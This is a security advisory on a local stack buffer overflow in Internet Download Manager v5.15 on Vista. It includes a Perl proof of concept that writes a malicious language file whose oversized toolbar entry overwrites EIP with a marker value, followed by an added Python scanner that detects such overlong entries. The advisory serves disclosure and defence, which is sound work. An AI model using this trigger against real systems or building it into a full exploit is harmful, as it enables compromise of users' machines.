Affected Software:
Internet Download Manager v5.15 Build 3 (4/December)
Description of Vulnerability:
Hellcode Research has discovered a local buffer overflow
vulnerability in Internet Download Manager.
The overflow occurs in the REMOTE buffer on the stack when a
long toolbar name is specified in the language file on Vista
(a non-default language file, not the English one).
Vulnerable version:
Internet Download Manager v5.15 Build 3 (4/December)
Platform:
Windows Vista SP1
Solution:
Update to a newer version.
Credits:
Discovered by musashi aka karak0rsan, Hellcode Research.
http://tcc.hellcode.net
musashi[at]hellcode.net
Special thanks to murderkey.
#####################PoC######################################
#Internet Download Manager v.5.15 Build 3 (4 December)
#Works on Vista
#HellCode Labs || TCC Group || http://tcc.hellcode.net
#Bug was found by "musashi" aka karak0rsan [musashi@hellcode.net]
#thanx to murderkey
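# Name of the language file to generate and its header line
$file="idm_tr.lng";
$lng= "lang=0x1f Trke";
# Oversized toolbar name: 1160 filler bytes followed by a 4-byte marker
$buffer = "\x90" x 1160;
$eip = "AAAA";
$toolbar = "20376=";
$packet=$toolbar.$buffer.$eip;
# Write the header line, then the overlong toolbar entry
open(my $fh, '>', $file) or die "Cannot open $file: $!";
print $fh $lng;
print $fh "\n";
print $fh $packet;
close($fh);
print "File has been created!\n";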
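
A defensive check for the condition described above, as an added example that is not part of the original advisory: it scans a language file for `id=value` entries whose value is far longer than a UI string or is a long run of a single byte. The 256-byte ceiling, the name `scan_lng` and the sample data are assumptions; the advisory does not state the real buffer size.

```python
import re
import sys

# Assumed ceiling for one UI string; the advisory does not give the real
# buffer size, only that 1160 filler bytes precede the 4-byte overwrite.
MAX_VALUE_LEN = 256
ENTRY_RE = re.compile(rb"^(\d+)=(.*)$", re.DOTALL)
RUN_RE = re.compile(rb"(.)\1{31,}", re.DOTALL)  # 32+ copies of one byte


def scan_lng(data: bytes, max_len: int = MAX_VALUE_LEN):
    """Return (line_no, string_id, value_len, reasons) for suspicious entries."""
    findings = []
    for line_no, raw in enumerate(data.splitlines(), start=1):
        m = ENTRY_RE.match(raw)
        if not m:
            continue  # header such as b"lang=0x1f ..." or a blank line
        value = m.group(2)
        reasons = []
        if len(value) > max_len:
            reasons.append("overlong")
        if RUN_RE.search(value):
            reasons.append("repeated-byte run")
        if reasons:
            findings.append((line_no, int(m.group(1)), len(value), reasons))
    return findings


# Constructed samples: IDs 100 and the strings are made up; 20376 is the
# toolbar entry named in the advisory, filled here with harmless "A" bytes.
BENIGN = b"lang=0x09 English\r\n100=Add URL\r\n20376=Main toolbar\r\n"
SUSPICIOUS = b"lang=0x1f Test\n100=Add URL\n20376=" + b"A" * 1164 + b"\n"

if __name__ == "__main__":
    # Scan every .lng path given on the command line.
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for line_no, sid, length, reasons in scan_lng(fh.read()):
                print(f"{path}:{line_no}: id {sid}, {length} bytes: "
                      f"{', '.join(reasons)}")
```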